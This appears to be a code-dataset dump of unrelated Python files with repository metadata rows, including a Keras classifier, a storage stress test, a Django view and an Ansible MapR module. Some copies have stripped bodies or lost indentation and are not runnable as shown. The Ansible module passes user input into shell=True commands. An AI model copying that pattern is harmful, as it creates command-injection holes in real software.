import os
from tensorflow.keras.models import Model
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.layers import (Conv2D, Dense, Flatten, Input,
Lambda, MaxPooling2D, Dropout)
def make_data():
path, dirs, files = next(os.walk("C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train/train"))
#file_count = len(files)
for file in files:
if file[0] == 'c':
os.rename("C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train/train/" + file,
"C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train/cat/" + file)
else:
os.rename("C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train/train/" + file,
"C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train/dog/" + file)
for label in ['dog', 'cat']:
path, dirs, files = next(os.walk("C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train/" + label))
#file_count = len(files)
for idx, file in enumerate(files):
if idx >= 10000:
os.rename(path + '/' + file,
"C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/test/" + label + '/' + file)
train_gen = ImageDataGenerator(rescale =1./255,
shear_range =0.2,
zoom_range = 0.2,
horizontal_flip =True)
test_gen = ImageDataGenerator(rescale = 1./255)
train_set = train_gen.flow_from_directory('C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/train',
target_size=(64,64),
batch_size= 32,
class_mode='binary')
test_set = test_gen.flow_from_directory('C:/Users/Sandesh Jain/OneDrive/Documents/Acads_VT/SEM3/dump/dogs-vs-cats/test',
target_size=(64,64),
batch_size= 32,
class_mode='binary')
def build_cat_dog_model():
input_img = Input((64,64,3))
x = Conv2D(32, (5, 5), strides=(1,1), padding = 'valid', activation='relu')(input_img)
x = Conv2D(32, (5, 5), strides=(1,1), padding = 'valid', activation='relu')(x)
x = MaxPooling2D()(x)
x = Conv2D(64, (3,3), strides=(1,1), padding = 'valid', activation='relu')(x)
x = Conv2D(64, (3,3), strides=(1,1), padding = 'valid', activation='relu')(x)
x = MaxPooling2D()(x)
x = Flatten()(x)
x = Dense(64, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(1, activation='sigmoid')(x)
model = Model(input_img, x)
model.compile(optimizer= 'adam', loss='binary_crossentropy', metrics=['accuracy'])
return model
dc_model = build_cat_dog_model()
dc_model.fit_generator(train_set,
epochs = 30,
validation_data =test_set)
| 1,888 | 0 | 51 |
836d5f3396fbb107c7f1329399d9eb4e57f2fdd0 | 5,575 | py | Python | io_tools/msrsync_sim.py | samuelsh/MultiFileOps | bc998fee6b02120a7783527767c93d5bf2ebfacd | [
"MIT"
] | 5 | 2019-06-05T11:22:25.000Z | 2020-07-13T10:37:01.000Z | io_tools/msrsync_sim.py | samuelsh/MultiFileOps | bc998fee6b02120a7783527767c93d5bf2ebfacd | [
"MIT"
] | 1 | 2021-01-05T11:18:27.000Z | 2021-01-05T11:18:27.000Z | io_tools/msrsync_sim.py | samuelsh/pyfs_stress | bc998fee6b02120a7783527767c93d5bf2ebfacd | [
"MIT"
] | null | null | null | #!/usr/bin/env python3.6
"""
author: samuels
"""
import argparse
import hashlib
import os
import queue
import sys
import random
import threading
sys.path.append(os.path.join(os.path.join('../')))
from concurrent.futures import ThreadPoolExecutor
from threading import Event
from client.generic_mounter import Mounter
from logger.server_logger import ConsoleLogger
from utils.shell_utils import StringUtils
logger = None
stop_event = None
files_counter = 0
dir_counter = 0
KB1 = 1024
MB1 = KB1 * 1024
DATA_BUF = os.urandom(KB1 * 8)
data_array = []
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
logger.info("Test stopped by user. See ya!")
stop_event.set()
except Exception as generic_error:
logger.exception(generic_error)
sys.exit(1)
| 33.787879 | 120 | 0.650583 | #!/usr/bin/env python3.6
"""
author: samuels
"""
import argparse
import hashlib
import os
import queue
import sys
import random
import threading
sys.path.append(os.path.join(os.path.join('../')))
from concurrent.futures import ThreadPoolExecutor
from threading import Event
from client.generic_mounter import Mounter
from logger.server_logger import ConsoleLogger
from utils.shell_utils import StringUtils
logger = None
stop_event = None
files_counter = 0
dir_counter = 0
KB1 = 1024
MB1 = KB1 * 1024
DATA_BUF = os.urandom(KB1 * 8)
data_array = []
class StatsCollector(threading.Timer):
def __init__(self, func, interval=60):
super().__init__(interval, func)
def run(self):
while not self.finished.is_set():
self.finished.wait(self.interval)
self.function(*self.args, **self.kwargs)
def print_stats_worker():
global logger, dir_counter, files_counter
logger.info("#### Stats >>> Created Directories: {} Created Files: {}".format(dir_counter, files_counter))
def init_data_array():
global data_array
for _ in range(100000):
buf = os.urandom(KB1 * 4)
buf = buf[0:random.randint(KB1 * 4 - 1, KB1 * 4)]
checksum = hashlib.md5(buf).hexdigest()
data_array.append({'filename': f"{checksum}_{len(buf)}", 'data': buf})
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--cluster", help="Cluster Name", required=True, type=str)
parser.add_argument("-e", "--export", help="NFS Export", default="/", type=str)
parser.add_argument("-d", "--test_dir", help="Directory under test", default="", type=str)
parser.add_argument("-f", "--files_num", help="Total to to create per directory", default=10000, type=int)
parser.add_argument("-t", "--threads", help="Number of files producer threads", default=16, type=int)
parser.add_argument("--duration", type=int, help="Test duration (in minutes)", default=10)
parser.add_argument('--start_vip', type=str, help="Start VIP address range")
parser.add_argument('--end_vip', type=str, help="End VIP address range")
return parser.parse_args()
def futures_validator(futures, raise_on_error=True):
global logger
for future in futures:
try:
future.result()
except Exception as e:
logger.error("ThreadPool raised exception: {}. Exiting with error.".format(e))
raise e
def files_producer_worker(mp, test_dir, repeats=10000):
global stop_event, logger, data_array
try:
for _ in range(repeats):
if stop_event.is_set():
break
file_entry = random.choice(data_array)
file_path = os.path.join(mp, test_dir, file_entry['filename'])
try:
with open(file_path, "wb") as f:
f.write(file_entry['data'])
except FileExistsError:
pass
except (IOError, OSError) as err:
logger.error(f"Files produces worker {threading.get_ident()} raised stop event due to error {err}")
stop_event.set()
raise err
except queue.Empty:
pass
def main():
global logger, stop_event
logger = ConsoleLogger('msrsync_sim').logger
stats_collector = StatsCollector(print_stats_worker)
stop_event = Event()
args = get_args()
test_dir = args.test_dir
files_num = args.files_num
logger.info("Initialising DataSet ...")
init_data_array()
logger.info("Mounting work path...")
mounter = Mounter(args.cluster, args.export, 'nfs3', 'MSRSYNC_SIM', logger=logger, nodes=0,
domains=0, sudo=True, start_vip=args.start_vip, end_vip=args.end_vip)
try:
mounter.mount_all_vips()
except AttributeError:
logger.warn("VIP range is bad or None. Falling back to single mount")
mounter.mount()
mount_point = mounter.get_random_mountpoint()
try:
os.mkdir(os.path.join(mount_point, test_dir))
except FileExistsError as e:
logger.warn(f"{e}")
logger.info(f"Test directory {test_dir} created on {mount_point}")
futures = []
logger.info(f"Going to produce {files_num * 100} files")
with ThreadPoolExecutor() as executor:
for _ in range(100):
futures.append(executor.submit(files_producer_worker, mounter.get_random_mountpoint(), test_dir, files_num))
futures_validator(futures, True)
logger.info("Done writing dataset, verifying...")
scandir_iterator = os.scandir(os.path.join(mount_point, test_dir))
for file_entry in scandir_iterator:
file_name = file_entry.name
stored_checksum, stored_length = file_name.split('_')
if int(stored_length) != os.stat(file_entry.path).st_size:
raise RuntimeError(f"File {file_entry.path} length mismatch!"
f" {int(stored_length)} != {os.stat(file_entry.path).st_size}")
with open(file_entry.path, 'rb') as f:
buf = f.read()
checksum = hashlib.md5(buf).hexdigest()
if stored_checksum != checksum:
raise RuntimeError(f"File {file_entry.path} checksum mismatch!"
f" {stored_checksum} != {checksum}")
logger.info("### Workload is Done. Come back tomorrow.")
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
logger.info("Test stopped by user. See ya!")
stop_event.set()
except Exception as generic_error:
logger.exception(generic_error)
sys.exit(1)
| 4,523 | 17 | 214 |
61a8114a54c19e8c1a637205d2457235593b05db | 916 | py | Python | test/python_comparison.py | fmaguire/metagenome_simulator | 79fc18ab21a897d2d16cca45e40e934acbf315d6 | [
"MIT"
] | null | null | null | test/python_comparison.py | fmaguire/metagenome_simulator | 79fc18ab21a897d2d16cca45e40e934acbf315d6 | [
"MIT"
] | null | null | null | test/python_comparison.py | fmaguire/metagenome_simulator | 79fc18ab21a897d2d16cca45e40e934acbf315d6 | [
"MIT"
] | null | null | null |
if __name__=="__main__":
name_to_aro = {'mel': "3000616", 'pmrA':"3000822" , 'patB': "3000025"}
strict_perfect = {'500': "strict", '1000': "perfect"}
expected_bedtool_labels = open('bedtools_labels.tsv', 'w')
labels = {}
with open('intersection.tsv') as fh:
for line in fh:
line = line.strip().split('\t')
labels.update({line[3]: [line[3], line[0], name_to_aro[line[-4]],
line[-4], strict_perfect[line[-3]], line[-1]]})
with open('output.fq') as fh:
for line_num, line in enumerate(fh):
if line_num % 4 == 0:
line = line.strip()
line = line.replace("@", '')
if line in labels:
expected_bedtool_labels.write("\t".join(labels[line])+"\n")
else:
expected_bedtool_labels.write("\t".join(["na"]*6)+"\n")
| 31.586207 | 79 | 0.505459 |
if __name__=="__main__":
name_to_aro = {'mel': "3000616", 'pmrA':"3000822" , 'patB': "3000025"}
strict_perfect = {'500': "strict", '1000': "perfect"}
expected_bedtool_labels = open('bedtools_labels.tsv', 'w')
labels = {}
with open('intersection.tsv') as fh:
for line in fh:
line = line.strip().split('\t')
labels.update({line[3]: [line[3], line[0], name_to_aro[line[-4]],
line[-4], strict_perfect[line[-3]], line[-1]]})
with open('output.fq') as fh:
for line_num, line in enumerate(fh):
if line_num % 4 == 0:
line = line.strip()
line = line.replace("@", '')
if line in labels:
expected_bedtool_labels.write("\t".join(labels[line])+"\n")
else:
expected_bedtool_labels.write("\t".join(["na"]*6)+"\n")
| 0 | 0 | 0 |
a6cea3059e191fe8d12739e5c5b75a0fafb9d802 | 1,822 | py | Python | src/commercetools/importapi/models/_schemas/inventories.py | labd/commercetools-python-sdk | d8ec285f08d56ede2e4cad45c74833f5b609ab5c | [
"MIT"
] | 15 | 2018-11-02T14:35:52.000Z | 2022-03-16T07:51:44.000Z | src/commercetools/importapi/models/_schemas/inventories.py | labd/commercetools-python-sdk | d8ec285f08d56ede2e4cad45c74833f5b609ab5c | [
"MIT"
] | 84 | 2018-11-02T12:50:32.000Z | 2022-03-22T01:25:54.000Z | src/commercetools/importapi/models/_schemas/inventories.py | labd/commercetools-python-sdk | d8ec285f08d56ede2e4cad45c74833f5b609ab5c | [
"MIT"
] | 13 | 2019-01-03T09:16:50.000Z | 2022-02-15T18:37:19.000Z | # This file is automatically generated by the rmf-codegen project.
#
# The Python code generator is maintained by Lab Digital. If you want to
# contribute to this project then please do not edit this file directly
# but send a pull request to the Lab Digital fork of rmf-codegen at
# https://github.com/labd/rmf-codegen
import re
import typing
import marshmallow
import marshmallow_enum
from commercetools import helpers
from ... import models
from .common import ImportResourceSchema
# Fields
# Marshmallow Schemas
| 29.387097 | 77 | 0.698683 | # This file is automatically generated by the rmf-codegen project.
#
# The Python code generator is maintained by Lab Digital. If you want to
# contribute to this project then please do not edit this file directly
# but send a pull request to the Lab Digital fork of rmf-codegen at
# https://github.com/labd/rmf-codegen
import re
import typing
import marshmallow
import marshmallow_enum
from commercetools import helpers
from ... import models
from .common import ImportResourceSchema
# Fields
# Marshmallow Schemas
class InventoryImportSchema(ImportResourceSchema):
sku = marshmallow.fields.String(allow_none=True, missing=None)
quantity_on_stock = marshmallow.fields.Float(
allow_none=True, missing=None, data_key="quantityOnStock"
)
restockable_in_days = marshmallow.fields.Float(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="restockableInDays",
)
expected_delivery = marshmallow.fields.DateTime(
allow_none=True,
metadata={"omit_empty": True},
missing=None,
data_key="expectedDelivery",
)
supply_channel = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.ChannelKeyReferenceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="supplyChannel",
)
custom = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".customfields.CustomSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.InventoryImport(**data)
| 62 | 1,216 | 22 |
a14f792aeed702ea0d392d0cee6f0f3d00bd091c | 1,909 | py | Python | unimodal/vision/dataset.py | shubham-gupta-iitr/mmmlX | 3485e6191e0e45bf1c8168e4e928a36ab9264d22 | [
"Apache-2.0"
] | null | null | null | unimodal/vision/dataset.py | shubham-gupta-iitr/mmmlX | 3485e6191e0e45bf1c8168e4e928a36ab9264d22 | [
"Apache-2.0"
] | null | null | null | unimodal/vision/dataset.py | shubham-gupta-iitr/mmmlX | 3485e6191e0e45bf1c8168e4e928a36ab9264d22 | [
"Apache-2.0"
] | 1 | 2022-02-12T23:38:10.000Z | 2022-02-12T23:38:10.000Z | import numpy as np
from torch.utils.data import Dataset
import cv2
from torchvision import transforms
import base64
from PIL import Image
np.random.seed(0)
| 34.709091 | 107 | 0.590885 | import numpy as np
from torch.utils.data import Dataset
import cv2
from torchvision import transforms
import base64
from PIL import Image
np.random.seed(0)
class ImageDataset(Dataset):
def __init__(self, cfg, ids, dataset):
self.cfg = cfg
self._ids = ids
self._num_ids = len(ids)
self._image_paths = []
self.lineidx_path = cfg.lineidx_path
self.image_tsv = cfg.image_tsv
with open(self.lineidx_path, "r") as fp_lineidx:
self.lineidx = [int(i.strip()) for i in fp_lineidx.readlines()]
image_paths = []
for id in self._ids:
for f in dataset[id]['img_posFacts']:
image_paths.append(f['image_id'])
for f in dataset[id]['img_negFacts']:
image_paths.append(f['image_id'])
self._image_paths = list(set(image_paths))
self._num_images = len(self._image_paths)
def __len__(self):
return self._num_images
def load_img(self, image_id):
with open(self.image_tsv, "r") as fp:
fp.seek(self.lineidx[int(image_id)%10000000])
imgid, img_base64 = fp.readline().strip().split('\t')
image = cv2.imdecode(np.frombuffer(base64.b64decode(img_base64), dtype=np.uint8), cv2.IMREAD_COLOR)
if image is None:
image = np.zeros((512,512,3), dtype=np.uint8)
image = image[:,:,::-1]
image = Image.fromarray(image)
tfs = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
image = tfs(image)
return image
def __getitem__(self, idx):
image_id = self._image_paths[idx]
image = self.load_img(image_id)
return image, image_id
| 1,599 | 7 | 138 |
cea112fa5664fda55582fe64fab2a7e867c249ca | 1,144 | py | Python | Lib/test/test_exceptions_jy.py | clach04/bb_import_jython | 4529a0f578186a1c33c476300294ab42658eaf7c | [
"CNRI-Jython"
] | 49 | 2015-03-10T17:34:19.000Z | 2021-11-10T22:23:18.000Z | Lib/test/test_exceptions_jy.py | clach04/bb_import_jython | 4529a0f578186a1c33c476300294ab42658eaf7c | [
"CNRI-Jython"
] | 1 | 2021-04-11T15:01:12.000Z | 2021-04-11T15:01:12.000Z | Lib/test/test_exceptions_jy.py | clach04/bb_import_jython | 4529a0f578186a1c33c476300294ab42658eaf7c | [
"CNRI-Jython"
] | 32 | 2015-02-06T12:10:32.000Z | 2019-06-18T03:21:36.000Z | """Misc. exception related tests
Made for Jython.
"""
from test import test_support
import unittest
#From bugtests/test076.py
if __name__ == '__main__':
test_main()
| 22.88 | 65 | 0.565559 | """Misc. exception related tests
Made for Jython.
"""
from test import test_support
import unittest
class C:
def __str__(self):
raise Exception("E")
def __repr__(self):
raise Exception("S")
class ExceptionsTestCase(unittest.TestCase):
def test_keyerror_str(self):
self.assertEquals(str(KeyError()), '')
# Is actually repr(args[0])
self.assertEquals(str(KeyError('')), "''")
self.assertEquals(str(KeyError('', '')), "('', '')")
#From bugtests/test076.py
def test_raise_no_arg(self):
r = None
try:
try:
raise RuntimeError("dummy")
except RuntimeError:
raise
except RuntimeError, e:
r = str(e)
self.assertEquals(r, "dummy")
def testBugFix1149372(self):
try:
c = C()
str(c)
except Exception, e:
assert e.args[0] == "E"
return
unittest.fail("if __str__ raises an exception, re-raise")
def test_main():
test_support.run_unittest(ExceptionsTestCase)
if __name__ == '__main__':
test_main()
| 756 | 10 | 201 |
c17d297d3e3b1768409a383f1791dd0e2160d9ed | 97 | py | Python | pythonProject/MUNDO 3/Relembrando listas 2.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | pythonProject/MUNDO 3/Relembrando listas 2.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | 1 | 2021-06-25T15:29:11.000Z | 2021-06-25T15:29:11.000Z | pythonProject/MUNDO 3/Relembrando listas 2.py | lucasjlgc/Aulas-de-Python- | 6aaed1c660487a680e9c449210600ccdfa326612 | [
"MIT"
] | null | null | null | import pandas as pd
df = pd.read_excel("Média teste.xlsx", sheet_name= "Média")
print(df.head()) | 24.25 | 59 | 0.721649 | import pandas as pd
df = pd.read_excel("Média teste.xlsx", sheet_name= "Média")
print(df.head()) | 0 | 0 | 0 |
5033e4ea9ff6c8c56046be03a2caffa035f89f26 | 1,117 | py | Python | src/interpreter.py | Vekteur/vprolog | c40afed4d61a7637e63d522b230ed4d187950382 | [
"MIT"
] | 1 | 2021-05-19T11:00:53.000Z | 2021-05-19T11:00:53.000Z | src/interpreter.py | Vekteur/vprolog | c40afed4d61a7637e63d522b230ed4d187950382 | [
"MIT"
] | null | null | null | src/interpreter.py | Vekteur/vprolog | c40afed4d61a7637e63d522b230ed4d187950382 | [
"MIT"
] | null | null | null | from prolog_parser import PrologParser
from inference import Inference
from copy import deepcopy
import sys
import lark | 23.270833 | 83 | 0.703671 | from prolog_parser import PrologParser
from inference import Inference
from copy import deepcopy
import sys
import lark
def read(file):
with open(file) as f:
return f.read()
class Interpreter:
builtin_file = 'data/builtin.pl'
def __init__(self, input_file):
program_parser = PrologParser()
self.request_parser = PrologParser('request')
program = program_parser.parse(read(Interpreter.builtin_file) + read(input_file))
self.inference = Inference(program)
def process_request(self, request):
nb_sols = 0
for sol in self.inference(request.body):
if sol.count_visible() == 0:
print('true.')
else:
print(sol)
nb_sols += 1
if nb_sols == 0:
print('false.')
def start(self):
while True:
prefix = '?- '
try:
str_request = input(prefix)
except KeyboardInterrupt:
break
if not str_request:
break
try:
request = self.request_parser.parse(prefix + str_request)
except lark.exceptions.LarkError:
print('Error : invalid syntax')
continue
try:
self.process_request(request)
except RecursionError:
print('Error : stack overflow') | 848 | 104 | 46 |
83d56b2fdd5a7b665bc10619bbd403eda9df6a10 | 1,479 | py | Python | hknweb/events/views/event_transactions/update_event.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | hknweb/events/views/event_transactions/update_event.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | hknweb/events/views/event_transactions/update_event.py | jyxzhang/hknweb | a01ffd8587859bf63c46213be6a0c8b87164a5c2 | [
"MIT"
] | null | null | null | from django.contrib import messages
from django.views.generic.edit import UpdateView
from hknweb.utils import (
method_login_and_permission,
DATETIME_12_HOUR_FORMAT,
PACIFIC_TIMEZONE,
)
from hknweb.events.models import Event
from hknweb.events.forms import EventUpdateForm
@method_login_and_permission("events.change_event")
| 33.613636 | 85 | 0.673428 | from django.contrib import messages
from django.views.generic.edit import UpdateView
from hknweb.utils import (
method_login_and_permission,
DATETIME_12_HOUR_FORMAT,
PACIFIC_TIMEZONE,
)
from hknweb.events.models import Event
from hknweb.events.forms import EventUpdateForm
@method_login_and_permission("events.change_event")
class EventUpdateView(UpdateView):
    """Edit form for an existing Event; requires the `events.change_event` permission."""
    model = Event
    form_class = EventUpdateForm
    template_name_suffix = "_manage"
    def get_context_data(self, **kwargs):
        """Add a page title ("Edit Event: <name>") to the template context."""
        context = super().get_context_data(**kwargs)
        context["title"] = f"Edit Event: {self.object.name}"
        return context
    def get_initial(self):
        """Override some prepopulated data with custom data; in this case, make times
        the right format."""
        initial = super().get_initial()
        # Render stored datetimes in Pacific time with the 12-hour display
        # format the form's widgets expect.
        initial["start_time"] = self.object.start_time.astimezone(
            PACIFIC_TIMEZONE
        ).strftime(DATETIME_12_HOUR_FORMAT)
        initial["end_time"] = self.object.end_time.astimezone(
            PACIFIC_TIMEZONE
        ).strftime(DATETIME_12_HOUR_FORMAT)
        return initial
    def form_valid(self, form):
        """Warn the editor that changing the RSVP limit sends no notifications."""
        if "rsvp_limit" in form.changed_data:
            messages.success(
                self.request,
                "People who rsvp'd or are on the waitlist are not notified"
                " when you change the rsvp limit. Be sure to make an announcement!",
            )
        return super().form_valid(form)
| 480 | 637 | 22 |
e71d446c2173eb797a2b7e29df4a14d48d6548ac | 7,353 | py | Python | library/mapr_entity.py | jaideepjoshi/ezmeral-orock-ansible | 6debe998cfd613ecf8a91d242e298b5b6822d936 | [
"Apache-2.0"
] | 35 | 2017-12-10T22:03:48.000Z | 2020-09-15T12:05:24.000Z | library/mapr_entity.py | jaideepjoshi/ezmeral-orock-ansible | 6debe998cfd613ecf8a91d242e298b5b6822d936 | [
"Apache-2.0"
] | 105 | 2017-11-28T10:13:23.000Z | 2022-01-07T00:33:21.000Z | library/mapr_entity.py | jaideepjoshi/ezmeral-orock-ansible | 6debe998cfd613ecf8a91d242e298b5b6822d936 | [
"Apache-2.0"
] | 53 | 2017-02-02T13:18:33.000Z | 2022-03-22T20:25:24.000Z | #!/usr/bin/python
ANSIBLE_METADATA = {
'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: mapr_entity
short_description: This module manages MapR accountable entities
version_added: "2.4"
description:
- "This module manages MapR accountable entities"
options:
name:
description:
- Entity name
required: true
type:
description:
- entity type: user or group
required: true
email:
description:
- Contact email for entity
required: false
soft_quota_in_mb:
description:
- Advisory quota in MB. Zero value means no quota. - default: 0
required: false
hard_quota_in_mb:
description:
- Hard quota in MB. Zero value means no quota. - default: 0
required: false
author:
- Carsten Hufe chufe@mapr.com
'''
EXAMPLES = '''
# Pass in a message
- name: Modify MapR entity
mapr_entity:
name: mapr
type: user
email: abc@email.com
soft_quota_in_mb: 1024
hard_quota_in_mb: 1024
'''
RETURN = '''
original_message:
description: The original name param that was passed in
type: str
message:
description: The output message that the sample module generates
'''
from ansible.module_utils.basic import AnsibleModule
import subprocess
import json
import getpass
import tempfile
def execute_entity_creation(type, name):
    '''
    Create a temporary volume and assign the user/group defined by type, name as accountable entity
    '''
    # Creating a volume with the entity as its accountable owner makes MapR
    # register the entity; the scratch volume is then removed immediately.
    temp_volume_name = create_temp_volume(type, name)
    remove_temp_volume(temp_volume_name)
if __name__ == '__main__':
    # NOTE(review): `main` is expected to be defined elsewhere in this module.
    main()
| 31.55794 | 143 | 0.636339 | #!/usr/bin/python
ANSIBLE_METADATA = {
'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: mapr_entity
short_description: This module manages MapR accountable entities
version_added: "2.4"
description:
- "This module manages MapR accountable entities"
options:
name:
description:
- Entity name
required: true
type:
description:
- entity type: user or group
required: true
email:
description:
- Contact email for entity
required: false
soft_quota_in_mb:
description:
- Advisory quota in MB. Zero value means no quota. - default: 0
required: false
hard_quota_in_mb:
description:
- Hard quota in MB. Zero value means no quota. - default: 0
required: false
author:
- Carsten Hufe chufe@mapr.com
'''
EXAMPLES = '''
# Pass in a message
- name: Modify MapR entity
mapr_entity:
name: mapr
type: user
email: abc@email.com
soft_quota_in_mb: 1024
hard_quota_in_mb: 1024
'''
RETURN = '''
original_message:
description: The original name param that was passed in
type: str
message:
description: The output message that the sample module generates
'''
from ansible.module_utils.basic import AnsibleModule
import subprocess
import json
import getpass
import tempfile
def run_module():
    """Core of the Ansible module: diff desired vs. current entity state and apply.

    Reads the playbook parameters, compares them against the entity as
    reported by ``maprcli entity info``, fills the standard Ansible
    ``result`` dict (changed / original_message / message / diff) and, when
    not in check mode, creates and/or modifies the entity before exiting
    through ``module.exit_json``.
    """
    # Arguments/parameters a playbook can pass to this module.
    module_args = dict(
        type=dict(type='str', required=True),
        name=dict(type='str', required=True),
        email=dict(type='str', required=False, default=''),
        soft_quota_in_mb=dict(type='int', required=False, default='0'),
        hard_quota_in_mb=dict(type='int', required=False, default='0')
    )
    result = dict(
        changed=False,
        original_message='No changes',
        message='No changes'
    )
    module = AnsibleModule(
        argument_spec=module_args,
        supports_check_mode=True
    )
    entity_info = get_entity_info(module.params['type'], module.params['name'])
    if entity_info is None:
        entity_exists = False
        old_values = dict()
    else:
        entity_exists = True
        # BUGFIX: the old `.encode('ascii', 'ignore')` produced `bytes` under
        # Python 3, which never compare equal to the (str) module params, so
        # `changed` was always reported.  Round-trip to get an ASCII `str`.
        old_values = dict(
            name=entity_info['EntityName'].encode('ascii', 'ignore').decode('ascii'),
            type="user" if int(entity_info['EntityType']) == 0 else 'group',
            email=(entity_info['EntityEmail'].encode('ascii', 'ignore').decode('ascii')
                   if 'EntityEmail' in entity_info else ''),
            soft_quota_in_mb=int(entity_info['EntityAdvisoryquota']),
            hard_quota_in_mb=int(entity_info['EntityQuota'])
        )
    new_values = dict(
        name=module.params['name'],
        type=module.params['type'],
        email=module.params['email'],
        soft_quota_in_mb=module.params['soft_quota_in_mb'],
        hard_quota_in_mb=module.params['hard_quota_in_mb']
    )
    if entity_exists:
        # BUGFIX: `dict.keys() + dict.keys()` raises TypeError on Python 3;
        # build the union of the key sets instead.
        for key in set(old_values) | set(new_values):
            if old_values[key] != new_values[key]:
                result['changed'] = True
                result['original_message'] = "Entity " + module.params['name'] + " exists - values updated"
                result['message'] = result['original_message']
                break
    else:
        result['changed'] = True
        result['original_message'] = "New entity " + module.params['name'] + " created"
        result['message'] = result['original_message']
    # Expose a human-readable before/after diff (used by --diff mode).
    result['diff'] = dict()
    result['diff']['before'] = build_compare_str(old_values)
    result['diff']['after'] = build_compare_str(new_values)
    if not module.check_mode and result['changed']:
        if not entity_exists:
            execute_entity_creation(new_values['type'], new_values['name'])
        # execute changes
        execute_entity_changes(new_values['type'], new_values['name'], new_values)
    module.exit_json(**result)
def build_compare_str(values):
    """Render a dict as newline-terminated ``key=value`` lines (diff output)."""
    return "".join("{}={}\n".format(key, values[key]) for key in values)
def get_entity_info(type, name):
    """Return the maprcli record for an entity, or None when it does not exist.

    ``type`` is "user" or "group"; maprcli encodes these as 0 and 1.
    """
    type_flag = "0" if type == "user" else "1"
    cmd = "maprcli entity info -name {} -type {} -json".format(name, type_flag)
    proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
    out, _ = proc.communicate()
    payload = json.loads(out)
    if 'data' in payload and len(payload['data']) > 0:
        return payload['data'][0]
    return None
def load_volume_names():
    """Return the names of all MapR volumes via ``maprcli volume list``."""
    proc = subprocess.Popen('maprcli volume list -columns n -json',
                            shell=True, stdout=subprocess.PIPE)
    out, _ = proc.communicate()
    listing = json.loads(out)
    return [str(entry['volumename']) for entry in listing['data']]
def suggest_temp_volume_name():
    """Pick a scratch volume name ('taec.<random>') not already in use."""
    taken = set(load_volume_names())
    while True:
        candidate = 'taec.' + next(tempfile._get_candidate_names())
        if candidate not in taken:
            return candidate
def create_temp_volume(type, name):
    """Create a scratch volume owned by the given accountable entity.

    Tries up to five times (with a freshly suggested name each attempt)
    and returns the created volume's name; raises RuntimeError when all
    attempts fail.
    """
    for _ in range(5):
        scratch = suggest_temp_volume_name()
        cmd = ('maprcli volume create'
               ' -name ' + scratch +
               ' -ae ' + name +
               ' -aetype ' + ('0' if type == 'user' else '1'))
        if subprocess.Popen(cmd, shell=True).wait() == 0:
            return scratch
    raise RuntimeError('Could not create temporary volume!')
def remove_temp_volume(volume_name):
    """Delete the given volume, retrying up to five times before giving up."""
    for _ in range(5):
        proc = subprocess.Popen('maprcli volume remove -name ' + volume_name,
                                shell=True)
        if proc.wait() == 0:
            return
    raise RuntimeError('Could not remove temporary volume ' + volume_name + '!')
def execute_entity_creation(type, name):
    """Register a user/group as a MapR accountable entity.

    Creating a volume with ``-ae <name>`` implicitly registers the entity;
    the scratch volume is removed again right away.
    """
    scratch = create_temp_volume(type, name)
    remove_temp_volume(scratch)
def execute_entity_changes(type, name, new_values):
    """Apply email/quota settings to an entity via ``maprcli entity modify``.

    :param type: "user" or "group" (maprcli encodes these as 0/1).
    :param name: entity name.
    :param new_values: dict with 'email', 'soft_quota_in_mb', 'hard_quota_in_mb'.
    :raises subprocess.CalledProcessError: when maprcli exits non-zero.
    """
    # SECURITY: `email` is caller-supplied; the previous implementation
    # interpolated it into a `shell=True` command string, allowing shell
    # command injection.  Pass an argv list with no shell instead.
    argv = [
        "maprcli", "entity", "modify",
        "-type", "0" if type == "user" else "1",
        "-name", name,
        "-email", new_values['email'],
        "-advisoryquota", str(new_values['soft_quota_in_mb']),
        "-quota", str(new_values['hard_quota_in_mb']),
    ]
    subprocess.check_call(argv)
def main():
    """Ansible entry point: delegate to the module body."""
    run_module()
if __name__ == '__main__':
    main()
| 5,414 | 0 | 207 |
31e32c129aa7d92384a69bef1420f94126542831 | 17,313 | py | Python | app/vehicle/managers.py | ab7289-tandon-nyu/csgy6083_PDS_Project | d2b7d22274dcabbb6ae35c17a8ffd06498f3634f | [
"MIT"
